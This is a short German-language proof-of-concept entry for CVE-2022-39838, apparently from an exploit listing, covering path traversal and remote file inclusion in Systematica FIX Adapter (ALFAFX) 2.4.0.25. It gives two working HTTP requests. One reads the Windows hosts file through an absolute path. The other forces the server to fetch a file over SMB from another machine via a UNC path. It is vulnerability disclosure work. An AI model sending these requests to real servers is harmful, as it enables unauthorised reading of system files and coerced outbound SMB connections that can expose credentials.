
Proof-of-Concept-Exploit für CVE-2022-39838, der Remote File Inclusion und Absolute Path Traversal in Systematica FIX Adapter (ALFAFX) 2.4.0.25 über HTTP-Anfragen demonstriert.
Systematica FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 ermöglicht das Einbinden entfernter Dateien über einen UNC-Pfad sowie absolute Pfadnavigation zu lokalen Pfaden.
PoC:
http://192.168.88.11:8888/info?page=logfile&file=C:\Windows\System32\drivers\etc\hosts
http://192.168.88.11:8888/info?page=logfile&file=\\192.168.88.100\rfi\test.txt
Falsche Zugriffskontrolle
Systematica
Systematica FIX Adapter (ALFAFX) - 2.4.0.25 (Build 13/09/2017)
Remote
true
Ein entfernter Benutzer kann über einen absoluten Pfad auf beliebige Dateien im Betriebssystem zugreifen. Zudem kann ein entfernter Benutzer den anfälligen Server zwingen, eine Datei von einem anderen Rechner über SMB anzufordern.
Ivashchenko Sergey (Jet Infosystems, jet.su)